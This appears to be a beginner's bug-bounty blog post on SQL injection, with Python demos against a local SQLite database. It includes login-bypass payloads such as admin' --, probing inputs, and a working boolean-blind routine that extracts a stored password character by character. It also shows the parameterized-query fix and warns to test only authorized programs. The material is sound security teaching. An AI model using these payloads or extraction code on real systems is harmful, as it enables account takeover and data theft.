June 16, 2026
SQL Injection for Absolute Beginners
Hey friends! Nitin here.
Nitin Yadav
2 min read
SQL injection. The legendary bug. The one that's been hacking websites for 20+ years and STILL works. Let me explain it so simply that you'll get it in five minutes.
What's A Database, Quickly?
Every app stores its data (users, passwords, orders) in a database. To get data out, the app asks the database questions in a language called SQL. Like: "Give me the user whose username is nitin."
So What's SQL Injection?
SQL injection is when YOU sneak your own instructions into that question. The app meant to ask one thing, but you trick it into asking something completely different, like "give me ALL users" or "log me in without a password."
It happens when an app pastes your input straight into the text of a database query, so the database can't tell where the query ends and your data begins. 😳
The Classic Example (Login Bypass)
Imagine a login that builds its query by gluing your input into the text: ... WHERE username = '(your input)' AND password = '(your input)'.
Now what if for the username you type:
admin' --
That ' closes the string early, and -- turns the rest of the line into a comment (ignored). The query now reads ... WHERE username = 'admin' --' AND password = '...', and everything after the -- is thrown away. The password check vanishes, and you're logged in as admin. No password needed. That's the magic (and horror) of SQLi. (One caveat: on MySQL the -- must be followed by a space or similar, which is why you'll see payloads like admin'-- - (the extra dash keeps the space from being trimmed) or admin'# instead.)
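The bypass above, run end to end, as an added example that is not code from this post. It assumes an in-memory SQLite database with a constructed users table (admin / correct-horse, nitin / hunter2), and the function names (build_vulnerable_query, login_vulnerable, login_safe) are mine. The first login glues input into the SQL text, the second uses a parameterized query, which is the actual fix: the driver sends the SQL and the values separately, so a quote or a -- in the input can never become syntax.

```python
import sqlite3

# Constructed sample data for the demo: one admin and one ordinary user.
# (A real app would store a password hash, not the plain password.)
SAMPLE_USERS = [("admin", "correct-horse"), ("nitin", "hunter2")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database with a tiny users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The bug: user input is glued into the SQL text with string formatting."""
    return (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def login_vulnerable(conn, username: str, password: str):
    """Returns the logged-in username, or None. Input goes straight into the query text."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """The fix: a parameterized query. The ? placeholders are filled by the driver,
    so a quote or -- in the input is compared as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    payload = "admin' --"
    # Show what the database actually receives: the password check is commented out.
    print(build_vulnerable_query(payload, "anything"))
    print("vulnerable login:", login_vulnerable(conn, payload, "wrong password"))
    print("safe login:      ", login_safe(conn, payload, "wrong password"))
    print("safe, real creds:", login_safe(conn, "admin", "correct-horse"))
```

Run it and compare the two results: the vulnerable login returns admin with a wrong password, the parameterized one returns None, and the parameterized one still works for genuine credentials. Note that the fix is not "cleaning" the input; it is keeping the input out of the query text entirely.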
How To Spot It
The first test is almost silly. Find an input (a search box, a URL parameter like ?id=5) and add a single quote:
?id=5'
If the page throws a database error or behaves weirdly, you might have found an injection point. Errors are your friend here. Two follow-ups turn a hunch into evidence: for a numeric parameter, try ?id=6-1 and see whether you get the same page as ?id=5 (the database did your arithmetic); for a text parameter, try a doubled quote like ?q=phone'' (that is an escaped quote in SQL), which should make the error from the single quote go away. And don't expect a pretty error: a generic 500, a blank page or a suddenly empty result can all be the "error".
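The same probes against a deliberately vulnerable lookup, as an added example (not code from this post). It assumes an in-memory SQLite database with a constructed products table, and the handler names (product_by_id for a numeric ?id= parameter, search for a text ?q= parameter, probe as the "tester watching the page") are mine. Each probe reports either the rows that came back or the database error, which is the signal you are looking for in the real page.

```python
import sqlite3

# Constructed sample catalog for the demo.
PRODUCTS = [(5, "phone"), (6, "laptop"), (7, "phone case")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return conn


def product_by_id(conn, id_param: str) -> list:
    """Vulnerable: a numeric URL parameter (?id=5) pasted into the query unquoted."""
    return [r[0] for r in conn.execute(f"SELECT name FROM products WHERE id = {id_param}")]


def search(conn, q: str) -> list:
    """Vulnerable: a text parameter (?q=phone) pasted inside the quotes of a LIKE pattern."""
    return [r[0] for r in conn.execute(f"SELECT name FROM products WHERE name LIKE '%{q}%'")]


def probe(handler, conn, value: str) -> tuple:
    """Run one probe and report ('ok', rows) or ('error', message), the way a tester
    watches for a normal page versus an error page."""
    try:
        return ("ok", handler(conn, value))
    except sqlite3.OperationalError as e:
        return ("error", str(e))


if __name__ == "__main__":
    conn = make_db()
    # Numeric parameter: baseline, the quote probe, then an arithmetic probe.
    # If 6-1 returns the same page as 5, the database is evaluating our input.
    for v in ["5", "5'", "6-1"]:
        print(f"?id={v:<6} ->", probe(product_by_id, conn, v))
    # Text parameter: a lone quote breaks the string literal, a doubled quote
    # ('' is an escaped quote in SQL) does not. Error-then-no-error is the tell.
    for v in ["phone", "phone'", "phone''"]:
        print(f"?q={v:<8} ->", probe(search, conn, v))
```

Notice the doubled quote does not restore the original results (the search term now contains a literal quote, so nothing matches); what matters is that the error disappears while the single quote alone still produces one. Apps that hide errors will show you only the "behaves weirdly" half of this, so compare the ?id=5 and ?id=6-1 responses byte for byte.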
Where It Lives In 2026
Real talk: you rarely find SQLi in obvious login forms anymore; those got hardened. Today it hides in:
- API parameters
- GraphQL queries
- Search and filter functions
- Mobile app endpoints (the app's backend often skips the protections the website has)
- Old, forgotten endpoints (recon pays off again!)
The Tool: sqlmap
Once you SUSPECT an injection, sqlmap automates the heavy lifting. You feed it a request and it confirms and exploits the injection for you. But โ and this matters โ learn the manual basics FIRST. If you only know how to point sqlmap at things, you'll miss the subtle injections that need a human brain. Tools confirm; humans discover.
My Honest Tip
Learn "blind" SQL injection too โ where there's no error message and no visible data, but the page behaves slightly differently for true vs false conditions. It's harder, fewer people test for it, and that's exactly why it's still findable. The boring, hard stuff is where the bounties hide.
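Boolean-based blind extraction worked through in code, as an added example that is not from this post. It assumes a vulnerable SQLite-backed endpoint that answers only "product found" or "not found" and swallows database errors (constructed users and products tables, and the function names product_page_exists, confirm_blind and extract_blind are mine). It goes a step beyond the text: after confirming the true/false difference it recovers a whole string from the database using nothing but those yes/no answers, with a binary search on each character's code point so each character costs about seven requests instead of one per candidate letter.

```python
import sqlite3

# Constructed sample data for the demo: the "secret" we pull out blind.
SAMPLE_USERS = [("admin", "S3cret!"), ("nitin", "hunter2")]
PRODUCTS = [(5, "phone"), (6, "laptop")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return conn


def product_page_exists(conn, id_param: str) -> bool:
    """Vulnerable endpoint. It shows no data and no error text, only
    'found' (True) versus 'not found' (False), which is all a blind attack needs."""
    try:
        row = conn.execute(f"SELECT 1 FROM products WHERE id = {id_param}").fetchone()
        return row is not None
    except sqlite3.OperationalError:
        return False  # errors are swallowed, like an app with error pages turned off


def confirm_blind(oracle) -> bool:
    """Step 1: a true condition must keep the page and a false one must remove it.
    oracle(payload) is the attacker's view: it returns the endpoint's True/False."""
    return oracle("5 AND 1=1") and not oracle("5 AND 1=2")


def extract_blind(oracle, secret_sql: str, max_len: int = 64) -> str:
    """Step 2: recover a string one character at a time from yes/no answers.
    secret_sql is a SQL expression (here a subquery) evaluated inside the victim's
    query. Each character is located by binary search over printable ASCII using
    unicode(substr(...)) > N, so roughly 7 requests per character."""
    out = ""
    for i in range(1, max_len + 1):
        # Past the end of the string substr() yields '' and unicode('') is NULL,
        # so even '> 31' is false: that is how we detect the end.
        lo, hi = 31, 127  # char > lo is true, char > hi is false (exclusive bounds)
        if not oracle(f"5 AND unicode(substr(({secret_sql}), {i}, 1)) > {lo}"):
            break
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(f"5 AND unicode(substr(({secret_sql}), {i}, 1)) > {mid}"):
                lo = mid
            else:
                hi = mid
        out += chr(hi)  # the only value left that is > lo and not > hi
    return out


if __name__ == "__main__":
    conn = make_db()
    requests = []

    def oracle(payload: str) -> bool:
        requests.append(payload)  # count what a real attack would send over the wire
        return product_page_exists(conn, payload)

    print("injectable:", confirm_blind(oracle))
    secret = extract_blind(oracle, "SELECT password FROM users WHERE username = 'admin'")
    print("admin password:", secret, "in", len(requests), "requests")
```

Every request here is a normal-looking product lookup that returns either the product page or a "not found" page, which is why this class of bug survives in places that never leak an error message. The same true/false oracle is what sqlmap automates once you have found it; time-based blind injection works the same way but uses a deliberate delay instead of a page difference as the signal.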
⚠️ And only ever test this on programs that authorize it. SQLi can damage data (an injected UPDATE or DELETE runs with whatever privileges the app's database account has), so be careful and stay in scope.
Next post: SSRF, making the server fetch things it really shouldn't.
Happy hacking! 🔥